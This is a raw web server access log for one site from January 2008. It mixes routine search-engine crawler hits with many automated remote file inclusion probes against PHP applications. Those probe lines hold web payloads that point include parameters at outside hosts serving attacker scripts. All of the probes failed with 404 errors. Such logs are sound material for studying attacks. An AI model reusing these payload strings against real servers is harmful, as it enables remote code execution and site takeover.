128.121.21.39 - - [03/Jan/2008:14:59:46 -0800] "GET /modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:15:01:50 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:04:40 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:04:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:04:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:15:05:28 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.204 - - [03/Jan/2008:15:05:36 -0800] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:05:59 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:15:07:34 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:15:07:48 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:15:07:48 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:15:07:48 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:12 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:12 -0800] "GET /convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:12 -0800] "GET /logs/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.204 - - [03/Jan/2008:15:08:33 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:42 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:42 -0800] "GET /convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:08:42 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:15:08:53 -0800] "GET /logs/access_071222.log//modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:09:21 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:09:21 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:09:22 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:15:10:11 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:15:10:11 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:10:16 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [03/Jan/2008:15:10:41 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:15:15:00 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:15:52 -0800] "GET /logs/access_071214.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:29 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:29 -0800] "GET /convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:29 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:31 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:31 -0800] "GET /convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:18:32 -0800] "GET /logs/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:19:38 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:15:19:38 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.26.38 - - [03/Jan/2008:15:21:54 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.26.38 - - [03/Jan/2008:15:21:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.26.38 - - [03/Jan/2008:15:21:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:15:24:21 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:15:24:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.243.232.112 - - [03/Jan/2008:15:24:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.123.128.28 - - [03/Jan/2008:15:25:11 -0800] "GET //skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
213.123.128.28 - - [03/Jan/2008:15:25:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:15:27:03 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:15:27:03 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:15:27:13 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:15:31:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:15:31:03 -0800] "GET /minamijewelry/html/images/main.jpg HTTP/1.1" 200 19269 "-" "Googlebot-Image/1.0" "www.dmulk.com"
209.216.249.194 - - [03/Jan/2008:15:32:27 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [03/Jan/2008:15:32:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [03/Jan/2008:15:32:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.178 - - [03/Jan/2008:15:33:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.178 - - [03/Jan/2008:15:33:05 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.178 - - [03/Jan/2008:15:33:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [03/Jan/2008:15:34:08 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.die-twisters.de/_airedale//me.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.71.230 - - [03/Jan/2008:15:34:38 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.71.230 - - [03/Jan/2008:15:34:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.71.230 - - [03/Jan/2008:15:34:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.98.226 - - [03/Jan/2008:15:37:55 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.98.226 - - [03/Jan/2008:15:37:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.98.226 - - [03/Jan/2008:15:37:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:15:39:15 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.78.197 - - [03/Jan/2008:15:43:02 -0800] "GET /logs/access_071220.log//config.php?xcart_dir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [03/Jan/2008:15:43:02 -0800] "GET //config.php?xcart_dir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [03/Jan/2008:15:43:02 -0800] "GET /logs//config.php?xcart_dir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.78.197 - - [03/Jan/2008:15:44:57 -0800] "GET //config.php?xcart_dir=http://dd3str0y3r.110mb.com/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:16:00:02 -0800] "GET /megumi/earrings/5_Venetian_Red_15.JPG HTTP/1.1" 200 442374 "-" "Googlebot-Image/1.0" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:16:00:32 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:16:03:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:16:03:41 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:16:04:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:16:04:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:16:04:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:16:04:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:16:13:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:16:13:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:16:39 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:16:40 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:16:40 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:16:17:29 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:16:17:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.40.92 - - [03/Jan/2008:16:17:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=www.crewfuck.kit.net/eval/safealba.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:17:47 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:17:47 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:17:47 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.79 - - [03/Jan/2008:16:18:27 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:16:22:37 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:24:10 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:24:11 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:24:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:25:13 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:16:25:20 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.222.23.58 - - [03/Jan/2008:16:27:54 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:16:28:23 -0800] "GET /logs/access_071229.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:16:28:23 -0800] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:16:28:23 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:16:28:52 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:31:19 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:31:20 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:31:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:34:14 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.229 - - [03/Jan/2008:16:37:12 -0800] "GET /bikes/dteel/?M=A HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.222.23.58 - - [03/Jan/2008:16:37:53 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [03/Jan/2008:16:37:53 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:38:34 -0800] "GET /logs/access_071221.log/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:38:35 -0800] "GET /protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:38:35 -0800] "GET /logs/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.222.23.58 - - [03/Jan/2008:16:39:27 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:41:08 -0800] "GET /logs/access_071221.log/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:41:08 -0800] "GET /protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:41:18 -0800] "GET /logs/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:43:40 -0800] "GET /logs/access_071219.log/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:16:48:14 -0800] "GET /logs/protection.php?siteurl=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
